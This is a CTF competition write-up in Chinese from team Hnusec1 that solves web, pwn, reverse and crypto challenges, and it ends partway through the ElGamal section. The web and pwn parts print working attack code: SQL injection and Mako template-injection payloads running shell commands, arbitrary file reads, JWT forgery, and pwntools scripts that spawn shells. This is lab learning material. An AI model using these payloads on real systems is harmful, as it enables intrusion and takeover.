队伍名称：Hnusec1

成员用户名：weixiao cinco J4toPos

队伍排名：8

web#

lit_ezsql#

进入后是一个查询页面

我们正常输入id=1，回显一行五列结果

首先是尝试了常规的 ” ’ \ 但都没有触发报错，这里我们换一个思路

尝试一下宽字节注入，出现报错

1
id=1%df%27

这个payload就相当于宽字节前缀 + 单引号，在 GBK 编码下会被数据库解释成一个合法的宽字节字符

继续测试

1
?id=1%df%27 or 1=1%23

返回了两行数据，说明注入确认成功。

由于正常查询结果中页面回显了五个字段，因此可以直接尝试五列联合查询。

1
?id=-1%df' union select 1,2,3,4,5%23

注入成功

查数据库

1
?id=-1%df' union select 1,database(),3,4,5%23

得到

1
ezsql

查表名

1
?id=-1%df' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()%23

得到

1
users,flag_store

查列名，注意这里要用十六进制绕过引号

1
?id=-1%df' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x666c61675f73746f7265%23

得到

1
id,flag

最后读flag

1
?id=-1%df' union select 1,flag,3,4,5 from flag_store%23

得到

1
flag{stlqpk43-cxn2-4vp-8dve-9vdtmpqho6ndq}

Northbridge Document Hub#

进入后是一个登录界面

查看前端源码，发现会加载 assets/js/portal.js

看一下这个js

1
(function () {
2
    var bootstrap = {
3
        release: "2026.03.01-r12",
4
        region: "cn-sh2",
5
        auth: {
6
            mode: "legacy-fallback",
7
            // researcher:Research#2026
8
            seed: "cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2"
9
        },
10
        fileGateway: {
11
            path: "/kkfileview/getCorsFile",
12
            queryKey: "urlPath",
13
            node: "legacy-parse-02"
14
        }
15
    };
16

17
    window.NorthbridgePortal = {
18
        config: bootstrap,
19
        decodeLegacyCredential: function () {
20
            try {
21
                return atob(bootstrap.auth.seed);
22
            } catch (e) {
23
                return "";
24
            }
25
        }
26
    };
27

28
    var form = document.querySelector("form[data-auth='portal']");
29
    if (form) {
30
        form.addEventListener("submit", function () {
31
            form.classList.add("is-submitting");
32
        });
33
    }
34
})();

有一个base64

1
cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2

可以拿到密码去登录

1
researcher
2
Research#2026

登录后进入

这里检索一下有没有 kkFileView 的 cve

这里有一个 CVE-2021-43734

https://blog.csdn.net/weixin_44304678/article/details/134320057

可以构造poc

1
/kkfileview/getCorsFile?urlPath=file:///etc/passwd

但是如果直接发会失败，说明设了一个简单的waf

根据源码猜测可能是要base64编码绕过，尝试进行一下编码

1
file:///etc/passwd
2
ZmlsZTovLy9ldGMvcGFzc3dk

实现绕过，可以任意文件读取

这里我们去读的是

1
/root/.bash_history

也就是

1
ZmlsZTovLy9yb290Ly5iYXNoX2hpc3Rvcnk=

得到

1
cd /opt/kkfileview/bin
2
./startup.sh --cache.dir=/opt/kkfileview/cache/parsed
3
java -jar kkFileView.jar --cache.dir=/opt/kkfileview/cache/parsed --forceUpdatedCache=true
4
cp /opt/kkfileview/cache/parsed/q1_finance_report_2026.zip /tmp/q1_finance_report_2026.zip

我们直接去读

1
/opt/kkfileview/cache/parsed/q1_finance_report_2026.zip

解压后拿到flag

1
flag{fic9nvxj-lyyc-4zq-8iv6-rbjnqwyfjbbre}

华辰企业服务运营平台#

进入后是一个运营平台，进入系统需要登录

dirsearch扫一下，可以发现有一个 /actuator

访问后暴露一些路由

我们直接去读

1
/actuator/env

可以直接拿到flag

1
flag{ijap7qay-mqfe-4yo-8pk3-cchdrmx9ckloj}

lit_reverse_my_web#

题目给了一个exe附件，为什么web手还得会逆向（）

扔进ida,分析main

也就是 Go 源码大致长这样：

1
var encKey = []byte{
2
    0x28,0x17,0x2D,0x05, 0x68,0x6A,0x68,0x6C,
3
    0x05,0x36,0x33,0x2E, 0x39,0x2E,0x3C,0x05,
4
    0x30,0x2D,0x2E,0x05, 0x29,0x3F,0x39,0x28,
5
    0x3F,0x2E,0x05,0x31, 0x3F,0x23,0x7B,0x7B,
6
}
7

8
func Key() []byte {
9
    out := make([]byte, len(encKey))
10
    for i, b := range encKey {
11
        out[i] = b ^ 0x5A
12
    }
13
    return out
14
}

提取 encKey

reverseMyWeb\_internal\_jwtsecret\.encKey 实际是一个 slice header，位于 \.data 段：

1
0xF68950: E0 E6 F0 00 00 00 00 00   // ptr  -> 0xF0E6E0
2
0xF68958: 20 00 00 00 00 00 00 00   // len  = 32
3
0xF68960: 20 00 00 00 00 00 00 00   // cap  = 32

读 0xF0E6E0 的 32 字节：

1
28 17 2D 05 68 6A 68 6C 05 36 33 2E 39 2E 3C 05
2
30 2D 2E 05 29 3F 39 28 3F 2E 05 31 3F 23 7B 7B

逐字节 XOR 0x5A：

`0x28`	`0x17`	`0x2D`	`0x05`	`0x68`	`0x6A`	`0x68`	`0x6C`
`r`	`M`	`w`	`\_`	`2`	`0`	`2`	`6`

完整字符串：

1
rMw_2026_litctf_jwt_secret_key!!

main.signJWT：claims 结构

1
// main.(*app).signJWT @ 0x9492a0
2
v16.RegisteredClaims.Issuer.str    = "reverseMyWeb";
3
v16.RegisteredClaims.Issuer.len    = 12;
4
v16.RegisteredClaims.Subject       = sub;
5
v16.RegisteredClaims.IssuedAt      = now (truncated);
6
v16.RegisteredClaims.ExpiresAt     = now + *24h*;
7
v16.Role                           = role;
8
SignedString(app.jwtKey)           // HS256

对应 Go 结构：

1
```go
2
type claims struct {
3
    Role string `json:"role"`
4
    jwt.RegisteredClaims
5
}

签发时算法是 SigningMethodHS256

main.parseToken：鉴权来源

1
// main.(*app).parseToken @ 0x949660
2
hdr = req.Header.Get("Authorization")
3
if strings.ToLower(hdr).hasPrefix("bearer ") {
4
    raw = strings.TrimSpace(hdr[7:])
5
} else if c, _ := req.Cookie("token"); c != nil {
6
    raw = c.Value
7
}
8
ParseWithClaims(raw, &main.claims{}, func(t) (interface{}, error) {
9
    return app.jwtKey, nil
10
})

也就是 token 可以放在 Authorization: Bearer \<jwt\> 或 Cookie: token=\<jwt\>。

main.handleFlag：访问控制

1
// main.(*app).handleFlag @ 0x9486a0
2
c = parseToken(req);
3
if (!c.ok)                      → 401 "会话无效或已过期"
4
if (c.role != "admin"           // 0x6e + 'admi' (1768776801)
5
        || len(c.role) != 5)    → 403 "您暂无此资源的访问权限"
6

7
data = os.ReadFile("/flag");
8
if wantsJSON(req): JSON {"content": strings.TrimSpace(data)}
9
else:              text/plain

1768776801 == \&\#39;admi\&\#39;$LE$、紧跟 \&\#39;n\&\#39;，长度 5 — 即字符串 \&\#34;admin\&\#34;。

接下来访问靶机，访问后是一个工作台，可以登录

先拿dirsearch扫，可以得到

1
GET  /
2
GET  /login
3
POST /login
4
GET  /register
5
POST /register
6
POST /logout
7
GET  /flag
8
GET  /static/*

我们直接用刚才拿到的key伪造JWT

1
*// header*
2
{"alg":"HS256","typ":"JWT"}
3

4
*// payload*
5
{"role": "admin","sub":  "admin","iss":  "reverseMyWeb","iat":  <now>,"exp":  <now + 86400>}

签名 = HMAC\_SHA256$secret, base64url\(header$ \+ \&\#34;\.\&\#34; \+ base64url$payload$\)。

解题脚本如下

1
import hmac
2
import hashlib
3
import base64
4
import json
5
import time
6
import urllib.request
7
import urllib.error
8

9
SECRET = b"rMw_2026_litctf_jwt_secret_key!!"
10
TARGET = "http://challenge.cyclens.tech:31020"
11

12
def b64u(data: bytes) -> str:
13
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
14

15
def forge_jwt(role: str = "admin", sub: str = "admin",
16
              iss: str = "reverseMyWeb", ttl: int = 86400) -> str:
17
    header = {"alg": "HS256", "typ": "JWT"}
18
    now = int(time.time())
19
    payload = {
20
        "role": role,
21
        "sub":  sub,
22
        "iss":  iss,
23
        "iat":  now,
24
        "exp":  now + ttl,
25
    }
26
    h = b64u(json.dumps(header,  separators=(",", ":")).encode())
27
    p = b64u(json.dumps(payload, separators=(",", ":")).encode())
28
    sig = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest()
29
    return f"{h}.{p}.{b64u(sig)}"
30

31
def get_flag(token: str) -> str:
32
    req = urllib.request.Request(
33
        TARGET + "/flag",
34
        headers={
35
            "Authorization": "Bearer " + token,
36
            "Cookie":        "token=" + token,
37
            "Accept":        "application/json",
38
        },
39
    )
40
    with urllib.request.urlopen(req, timeout=20) as r:
41
        return r.read().decode("utf-8", errors="replace")
42

43
def decode_enc_key():
44

45
    enc_key = bytes.fromhex(
46
        "28172D05686A686C0536332E392E3C05"
47
        "302D2E05293F39283F2E05313F237B7B"
48
    )
49
    plain = bytes(b ^ 0x5A for b in enc_key)
50
    print("[*] encKey  :", enc_key.hex())
51
    print("[*] secret  :", plain.decode())
52
    assert plain == SECRET
53

54
if __name__ == "__main__":
55
    decode_enc_key()
56

57
    token = forge_jwt()
58
    print("[*] forged JWT:")
59
    print(token)
60

61
    print("[*] requesting /flag ...")
62
    try:
63
        body = get_flag(token)
64
        print("[+] response:")
65
        print(body)
66
    except urllib.error.HTTPError as e:
67
        print(f"[-] HTTP {e.code}")
68
        print(e.read().decode(errors="replace"))

运行拿到flag

1
flag{ivwqa2na-6enh-4yt-8bhr-3l5y8zkmygyx4}

lit_ezssti#

进入后可以发现是一个模版渲染表单，那肯定就是打ssti了

测试一下常见的payload，比如{{7*7}}等等，发现都没用，直到试了下面这个

1
%if 1%

触发报错

根据这些字符串，可以推测是mako模版

fuzz一下，可以得到以下黑名单

1
[ ]
2
=
3
.
4
<%=
5
${
6
flag
7
self.

在mako中，可以用 <% … %> 执行python代码，但是没有回显，这里我们可以用

1
raise Exception

实现渲染异常，从而得到回显

1
<% from os import popen; raise Exception(getattr(popen("whoami"), "read")()) %>

然后用from os import popen绕过os.popen

getattr(obj, "read")() 绕过 .read()

用chr拼接绕过flag

payload如下

1
<% from os import popen; raise Exception(getattr(popen(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)),chr(114)+chr(101)+chr(97)+chr(100))()) %>

拿到flag

1
flag{1wuiv7yx-mfmi-4uw-8usy-jhnfwupf1veau}

Pwn#

lit_ret2text32#

简单签到题

栈溢出有后门

1
from pwn import *
2
context(os='linux', log_level='debug')
3
p = process('./ret2text32')
4
#p=remote("challenge.cyclens.tech",30425)
5
elf=ELF("./ret2text32")
6

7
bk=0x8049213
8
payload=b'a'*0x3c+p64(bk)
9
p.sendlineafter("Input: ",payload)
10

11
p.interactive()

lit_ret2shellcode#

栈段可执行，又泄露出了栈地址

直接向栈内写入shellcode，然后控制执行流到buf

1
from pwn import *
2
context(os='linux', log_level='debug',arch='amd64')
3
#p = process('./ret2shellcode')
4
p=remote("challenge.cyclens.tech",31103)
5
elf=ELF("./ret2shellcode")
6

7
p.recvuntil(b'0x')
8
buf=int(p.recv(12),16)
9
log.info("buf:"+hex(buf))
10

11
shellcode=asm(shellcraft.sh())
12
payload=shellcode.ljust(0x78,b'a')
13
payload+=p64(buf)
14
p.sendlineafter("Leave your mark on the stack: ",payload)
15

16
p.interactive()

lit_integer_overflow#

有后门backdoor，有栈溢出，只不过需要绕过对size的检测

注意到size比较时是unsigned int类型，整数溢出，输入-1

-1<0x40，绕过检测，同时负数转化为0xff……溢出空间足够大

1
from pwn import *
2
context(os='linux', log_level='debug',arch='amd64')
3
p = process('./integer_overflow')
4
#p=remote("challenge.cyclens.tech",31104)
5
elf=ELF("./integer_overflow")
6

7
bk=0x4011D8
8
p.sendlineafter("(0-63): ",b'-1')
9
payload=b'a'*0x48+p64(bk)
10
p.sendline(payload)
11

12
p.interactive()

lit_ropchain#

rop链，gadget都给出来了，有system没有binsh

先向bss段read一个/bin/sh\x00

1
read(0,bss,0x10)

然后打出

system("/bin/sh")

1
from pwn import *
2
context(os='linux', log_level='debug',arch='amd64')
3
#p = process('./ropchain')
4
p=remote("challenge.cyclens.tech",31002)
5
elf=ELF("./ropchain")
6

7
pop_rdi=0x401166
8
pop_rsi=0x40116B
9
pop_rdx=0x401170
10
bss = elf.bss() + 0x500
11
read=elf.plt["read"]
12
system=elf.plt["system"]
13

14
payload = b'a'*0x48
15
payload += p64(pop_rdi)
16
payload += p64(0)
17
payload += p64(pop_rsi)
18
payload += p64(bss)
19
payload += p64(pop_rdx)
20
payload += p64(0x10)
21
payload += p64(read)
22
payload += p64(pop_rdi)
23
payload += p64(bss)
24
payload += p64(system)
25
p.sendlineafter("Input: ",payload)
26

27
p.sendline(b'/bin/sh')
28

29
p.interactive()

lit_ret2syscall32#

gadget很全，栈溢出空间足够，唯一一个问题是没有可用的/bin/sh

先调用read函数向bss段写binsh，然后返回到vuln

然后用syscall调用execve("/bin/sh",0,0)

1
from pwn import *
2
context(os='linux', log_level='debug')
3
#p = process('./ret2syscall32')
4
p=remote("challenge.cyclens.tech",30689)
5
elf=ELF("./ret2syscall32")
6

7
pop_eax=0x80491A6
8
pop_ebx=0x80491AB
9
pop_ecx_ebx=0x80491B0
10
pop_edx=0x80491B6
11
int80=0x80491C1
12
bss=elf.bss()+0x200
13
#gdb.attach(p)
14
payload = flat(
15
    b"A" * 0x4c,
16
    elf.plt["read"],
17
    elf.sym["vuln"],
18
    0,
19
    bss,
20
    10,
21
)
22

23
p.sendlineafter("Input: ",payload)
24
pause()
25
p.sendline(b'/bin/sh\x00')
26

27
payload = flat(
28
    b"A" * 0x4c,
29
    pop_eax,
30
    0xb,
31
    pop_ecx_ebx, 0, bss,
32
    pop_edx, 0,
33
    int80
34
)
35
p.sendlineafter("Input: ",payload)
36

37
p.interactive()lit_ret2libc

lit_ret2libc#

leak可以泄露地址，把got表当作参数传入即可泄露libc

这里出了问题，跳回到vuln失败

不懂怎么回事，只能用其他方法打了

把 saved rbp 伪造成 .bss+0x40，然后跳到 vuln 里现成的 read 准备位置。这样程序会把第二阶段 payload 直接读进 .bss，最后用函数尾的 leave; ret 把栈迁移过去。

第二阶段

在 .bss 里放一个 "/bin/sh\x00" 和 argv = {"/bin/sh", NULL}，然后 ROP 调：

execve$\&\#34;/bin/sh\&\#34;, argv, NULL$

1
from pwn import *
2
context(os='linux', log_level='debug',arch='amd64')
3
#p = process('./ret2libc')
4
p=remote("challenge.cyclens.tech",31534)
5
elf=ELF("./ret2libc")
6
libc=ELF("./libc_remote.so")
7

8
ret=0x40101A
9
pop_rdi=0x4011B7
10
leak=0x4011C3
11
read_setup=0x40121B
12
bss=elf.bss()+0x800
13
fake_rbp=bss+0x40
14

15
stage1 = flat(
16
    b'a'*0x40,
17
    p64(fake_rbp),
18
    p64(ret),
19
    p64(pop_rdi),
20
    elf.got["puts"],
21
    p64(leak),
22
    p64(read_setup)
23
)
24
p.sendlineafter("Tell me your name: ",stage1)
25
p.recvuntil(b'0x')
26
puts=int(p.recv(12),16)
27
log.info("puts:"+hex(puts))
28

29
libc_base=puts-libc.sym["puts"]
30
execve=libc_base+libc.sym["execve"]
31
pop_rsi=libc_base+0x2be51
32
pop_rdx_r12=libc_base+0x11f367
33
ret2=libc_base+0x29139
34
log.info(hex(libc_base))
35
log.info(hex(execve))
36

37
binsh=bss+0x100
38
argv=bss+0x120
39

40
payload=bytearray(b'\x00'*0x180)
41
payload[0x100:0x108]=b'/bin/sh\x00'
42
payload[0x120:0x130]=flat(p64(binsh),p64(0))
43
rop=flat(
44
    p64(ret2),
45
    p64(pop_rdi),p64(binsh),
46
    p64(pop_rsi),p64(argv),
47
    p64(pop_rdx_r12),p64(0),p64(0),
48
    p64(execve)
49
)
50
payload[0x40:0x48]=p64(0)
51
payload[0x48:0x48+len(rop)]=rop
52
p.send(bytes(payload))
53

54
p.interactive()

Reverse#

lit_rc4_variant#

程序拖入IDA，找到main函数，输入长度要求29

把输入复制到加密缓冲

加密缓冲约定

KSA 第一阶段：`S[i] = i` 和 `K[i] = key[i % 12]

KSA 第二阶段

PRGA + XOR

总结这套魔改算法（encrypt$input$）：

1
S[64] = 0..63
2
K[i]  = key[i % len(key)]            for i in 0..63
3
j = 0
4
for i in 0..63:
5
    j = (j + S[i] + K[i]) mod 64
6
    swap(S[i], S[j])                 # 标准 KSA，但模 64 而不是 256
7

8
i = j = 0
9
for each byte b of plaintext:
10
    i = (i + 1) mod 64
11
    j = (j + S[i]) mod 64
12
    t = (S[i] + S[j]) mod 64         # ← 这里是 mod 64！
13
    swap(S[i], S[j])
14
    ks = (S[i] + S[t]) mod 256       # ← 输出是 “两个 S 项相加”，不是 S[(S[i]+S[j])&0xFF]
15
    cipher_byte = b ^ ks

比对密文

解题脚本

1
key = b"lit_rc4_key!"
2
ct = bytes([0x7b,0x3d,0x38,0x77,0x4e,0x72,0x42,0x7d,0x45,0x37,0x76,0x0f,
3
            0x53,0x53,0x4f,0x66,0x37,0x17,0x75,0x37,0x5f,0x49,0x58,0x72,
4
            0x74,0x7f,0x79,0x1f,0x3a])
5

6
S = list(range(64))
7
K = [key[i % len(key)] for i in range(64)]
8

9
j = 0
10
for i in range(64):
11
    j = (j + S[i] + K[i]) % 64
12
    S[i], S[j] = S[j], S[i]
13

14
i = j = 0
15
out = bytearray()
16
for c in ct:
17
    i = (i + 1) % 64
18
    s_i_old = S[i]
19
    j = (j + s_i_old) % 64
20
    s_j_old = S[j]
21
    t = (s_i_old + s_j_old) % 64
22
    # swap
23
    S[i], S[j] = S[j], S[i]
24
    # keystream = S[i]_new + S[t]   where S[t] uses post-swap state
25
    K_byte = (S[i] + S[t]) & 0xFF
26
    out.append(c ^ K_byte)
27

28
print("Plaintext:", out)
29
try:
30
    print("Decoded:", out.decode())
31
except UnicodeDecodeError:
32
    print("Not pure ASCII")

LitCTF{rev05_rc4_variant_64!}

lit_tea_standard#

main函数如下

几个关键点：

明文长度：填充后 v7 == 32，意味着原 flag 长度落在 25..31（含 31，但 31 时填一个 \x01，长度则达到 32）。
轮数 / delta：循环条件 i != -957401312 即 i != 0xC6EF3720，恰好等于 32 * 0x9E3779B9，标准 TEA 32 轮。
密钥：把 + 形式里出现的负常量按无符号还原

16 * v 在 TEA 里就是 v << 4，对应分支：

v1 += ((v0 << 4) + k0) ^ (v0 + sum) ^ ((v0 >> 5) + k1)
v0 += ((v1 << 4) + k2) ^ (v1 + sum) ^ ((v1 >> 5) + k3)

再看一眼密文 g_cipher（位于 .rdata: 0x140012040，32 字节）：

解题脚本

1
import struct
2

3
ct = bytes.fromhex(
4
      "edef21feb79b3cb0"
5
      "1e9372e2023e29bc"
6
      "36f70c922e5aae46"
7
      "44fa45251ae58c87"
8
  )
9

10
k0, k1, k2, k3 = 0xCAFEBABE, 0xDEADBEEF, 0xA11CEFAC, 0xB00B1E00
11
delta = 0x9E3779B9
12
M = 0xFFFFFFFF
13

14
def decrypt_block(v0, v1):
15
      s = (32 * delta) & M
16
      for _ in range(32):
17
          v1 = (v1 - ((((v0 << 4) + k0) ^ (v0 + s) ^ ((v0 >> 5) + k1))) ) & M
18
          v0 = (v0 - ((((v1 << 4) + k2) ^ (v1 + s) ^ ((v1 >> 5) + k3))) ) & M
19
          s  = (s - delta) & M
20
      return v0, v1
21

22
pt = b""
23
for i in range(0, len(ct), 8):
24
      v0, v1 = struct.unpack("<II", ct[i:i+8])
25
      p0, p1 = decrypt_block(v0, v1)
26
      pt += struct.pack("<II", p0, p1)
27

28
pad = pt[-1]
29
print(pt[:-pad].decode())

LitCTF{rev03_tea_standard!!}

lit_b64_alphabet#

IDA打开程序，逻辑全在main函数，就是一个换了字母表的Base64

每 3 字节 -> 24 bit -> 拆 4 段 6 bit -> 查表 g\_alphabet

末尾不足 3 字节用 = 补齐
编码结果与 g\_expected 直接 strcmp

字母表

1
2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI

密文比对加判断

解题脚本

1
import base64
2

3
# 0x140012080: 自定义 Base64 字母表
4
CUSTOM_ALPHABET = "2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI"
5

6
# RFC 4648 标准 Base64 字母表
7
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
8

9
# 0x140012040: 程序内嵌的期望密文
10
EXPECTED = "zjA5lToj9PUAGn2O+v6TRPosgYWB6noyGjhBgjfwyl=="
11

12
def solve(ciphertext: str) -> str:
13
    assert len(CUSTOM_ALPHABET) == 64 and len(set(CUSTOM_ALPHABET)) == 64
14
    trans = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
15
    mapped = ciphertext.translate(trans)
16
    return base64.b64decode(mapped).decode()
17

18
if __name__ == "__main__":
19
    flag = solve(EXPECTED)
20
    print("[+] mapped :", EXPECTED.translate(str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)))
21
    print("[+] flag   :", flag)

LitCTF{rev02_custom_b64_table!}

lit_xor_chain#

main函数如下：

逻辑非常直白：

读入 30 字节字符串。
对每个字节先 xor 0x52，再 \+ 5。
与 g\_expected 数组逐字节比较。

解题脚本

1
expected = bytes([
2
    0x23, 0x40, 0x2B, 0x16, 0x0B, 0x19, 0x2E, 0x25,
3
    0x3C, 0x29, 0x67, 0x68, 0x12, 0x2F, 0x42, 0x25,
4
    0x12, 0x2B, 0x3F, 0x3C, 0x41, 0x12, 0x38, 0x3B,
5
    0x3B, 0x12, 0x42, 0x3E, 0x78, 0x34,
6
])
7

8
flag = bytes(((b - 5) & 0xFF) ^ 0x52 for b in expected)
9
print(flag.decode())

LitCTF{rev01_xor_then_add_ok!}

lit_xtea_tweak#

输入先8字节对齐

PKC#7风格填充

明文长度32

魔改的xtea算法

4 × 32-bit 子密钥 g\_key
64-bit 块,32 轮
但常量 delta 被换成了 0xDEADBEEF
- 559038737 == 0x21524111 == \-0xDEADBEEF $mod 2^32$,所以 i \-= 559038737 即 i \+= 0xDEADBEEF
- 终止值 \-709370400 == 0xD5C593E0 == $0xDEADBEEF \* 32$ \& 0xFFFFFFFF

用到的数据

解题脚本

1
import struct
2

3
CIPHER = bytes([
4
    0xE3, 0xEE, 0x1E, 0xE7, 0xD3, 0xA7, 0x96, 0x6F,
5
    0xC6, 0xA7, 0xB9, 0xE1, 0xB9, 0x4E, 0x67, 0x86,
6
    0x5F, 0x03, 0x04, 0xA6, 0xDB, 0xBB, 0xB9, 0x40,
7
    0x56, 0x3A, 0xF7, 0x9E, 0xEE, 0x64, 0xD4, 0x06,
8
])
9

10
KEY = [0x11111111, 0x22222222, 0x33333333, 0x44444444]
11

12
DELTA  = 0xDEADBEEF
13
ROUNDS = 32
14
MASK   = 0xFFFFFFFF
15

16
def xtea_decrypt_block(v0: int, v1: int, key, rounds=ROUNDS, delta=DELTA):
17

18
    s = (delta * rounds) & MASK
19
    for _ in range(rounds):
20
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) & MASK ^ (s + key[(s >> 11) & 3]) & MASK)) & MASK
21
        s  = (s - delta) & MASK
22
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) & MASK ^ (s + key[s & 3]) & MASK)) & MASK
23
    return v0, v1
24

25
def main():
26
    plain = b""
27
    for i in range(0, len(CIPHER), 8):
28
        a, b = struct.unpack("<II", CIPHER[i:i+8])
29
        a, b = xtea_decrypt_block(a, b, KEY)
30
        plain += struct.pack("<II", a, b)
31

32
    pad = plain[-1]
33
    if 1 <= pad <= 8 and plain.endswith(bytes([pad]) * pad):
34
        plain = plain[:-pad]
35

36
    print("flag:", plain.decode())
37

38
if __name__ == "__main__":
39
    main()

LitCTF{rev04_xtea_delta_twk!}

Crypto#

lit_xor_two_story#

题目原件是一个py脚本

1
#!/usr/bin/env python3
2
"""
3
LitCTF2026 — One-time pad reused for two messages (40 bytes each).
4

5
Players receive output.txt and README; they do not receive secret.py.
6
"""
7
from __future__ import annotations
8

9
import argparse
10
import os
11
from pathlib import Path
12

13
try:
14
    from secret import M1_FLAG
15
except ImportError:
16
    raise SystemExit(
17
        "secret.py (organizer) is required to generate ciphertext; "
18
        "players work from output.txt only."
19
    )
20

21
# Public second message — duplicated in README for contestants.
22
M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!"
23

24
assert len(M1_FLAG) == len(M2_KNOWN) == 40
25

26

27
def xor_bytes(a: bytes, b: bytes) -> bytes:
28
    return bytes(x ^ y for x, y in zip(a, b))
29

30

31
def main() -> None:
32
    parser = argparse.ArgumentParser()
33
    parser.add_argument(
34
        "--write",
35
        type=Path,
36
        help="Write hex lines to file.",
37
    )
38
    args = parser.parse_args()
39

40
    n = len(M1_FLAG)
41
    k = os.urandom(n)
42
    c1 = xor_bytes(M1_FLAG, k)
43
    c2 = xor_bytes(M2_KNOWN, k)
44

45
    lines = [
46
        f"c1 = {c1.hex()}",
47
        f"c2 = {c2.hex()}",
48
        f"len = {n}",
49
    ]
50
    text = "\n".join(lines) + "\n"
51
    print(text, end="")
52
    if args.write:
53
        args.write.write_text(text, encoding="utf-8")
54

55

56
if __name__ == "__main__":
57
    main()
58

59
# c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28
60
# c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474
61
# len = 40

核心逻辑：

1
M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!"   # 40 字节，已公开
2
assert len(M1_FLAG) == len(M2_KNOWN) == 40
3

4
n = len(M1_FLAG)
5
k = os.urandom(n)               # 随机密钥
6
c1 = xor_bytes(M1_FLAG, k)      # 加密 flag
7
c2 = xor_bytes(M2_KNOWN, k)     # 用同一把 k 加密公开消息

输出：

1
c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28
2
c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474
3
len = 40

关键点：同一把一次性密钥 `k` 被用于两条消息，且其中一条 `M2` 完全已知。这是经典的 OTP key‑reuse（two‑time pad）漏洞。

求解脚本

1
c1 = bytes.fromhex("5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28")
2
c2 = bytes.fromhex("5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474")
3
m2 = b"litctf2026_xor_keystream_reuse_40bytes!!"
4

5
flag = bytes(a ^ b ^ c for a, b, c in zip(c1, c2, m2))
6
print(flag.decode())

litctf{otp_reuse_never_twice_same_key__}

lit_elgamal_handshake#

题目原件

1
#!/usr/bin/env python3
2
"""
3
LitCTF2026 — ElGamal handshake (story)
4
Someone left debug logging on; the private exponent x was printed alongside ciphertext.
5
"""
6
from __future__ import annotations
7

8
import argparse
9
from pathlib import Path
10
from random import randrange
11

12
from Crypto.Util.number import bytes_to_long, getPrime, getRandomRange
13

14
try:
15
    from secret import FLAG
16
except ImportError as e:
17
    raise SystemExit("secret.py (FLAG) is required to encrypt.") from e
18

19

20
def generate_elgamal_keypair(bits: int = 512) -> tuple[int, int, int, int]:
21
    p = getPrime(bits)
22
    for _ in range(1000):
23
        g = getRandomRange(2, min(6, p - 1))
24
        if pow(g, (p - 1) // 2, p) != 1:
25
            break
26
    else:
27
        raise RuntimeError("could not find suitable g")
28
    x = randrange(2, p - 1)
29
    y = pow(g, x, p)
30
    return p, g, y, x
31

32

33
def main() -> None:
34
    parser = argparse.ArgumentParser()
35
    parser.add_argument(
36
        "--write",
37
        type=Path,
38
        help="Write captured output to this file (for organizers).",
39
    )
40
    args = parser.parse_args()
41

42
    p, g, y, x = generate_elgamal_keypair(bits=512)
43
    k = randrange(1, p - 2)
44
    m = bytes_to_long(FLAG)
45
    if m >= p:
46
        raise ValueError("flag too large for chosen p — shorten FLAG")
47

48
    c1 = pow(g, k, p)
49
    c2 = (m * pow(y, k, p)) % p
50

51
    lines = [
52
        "=== Public key (p, g, y) ===",
53
        f"p = {p}",
54
        f"g = {g}",
55
        f"y = {y}",
56
        "",
57
        "=== Ciphertext (c1, c2) ===",
58
        f"c1 = {c1}",
59
        f"c2 = {c2}",
60
        "",
61
        "# [DEBUG] prod accidentally logged the long-term secret:",
62
        f"x = {x}",
63
    ]
64
    text = "\n".join(lines) + "\n"
65
    print(text, end="")
66
    if args.write:
67
        args.write.write_text(text, encoding="utf-8")
68

69

70
if __name__ == "__main__":
71
    main()
72

73
# === Public key (p, g, y) ===
74
# p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
75
# g = 3
76
# y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357
77

78
# === Ciphertext (c1, c2) ===
79
# c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
80
# c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654
81

82
# # [DEBUG] prod accidentally logged the long-term secret:
83
# x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884

题目实现了一个标准的 ElGamal 加密方案，但在调试输出中"意外地"打印了长期私钥 x。

公开参数#

1
p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
2
g = 3
3
y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357

密文#

1
c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
2
c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654

泄漏的私钥#

1
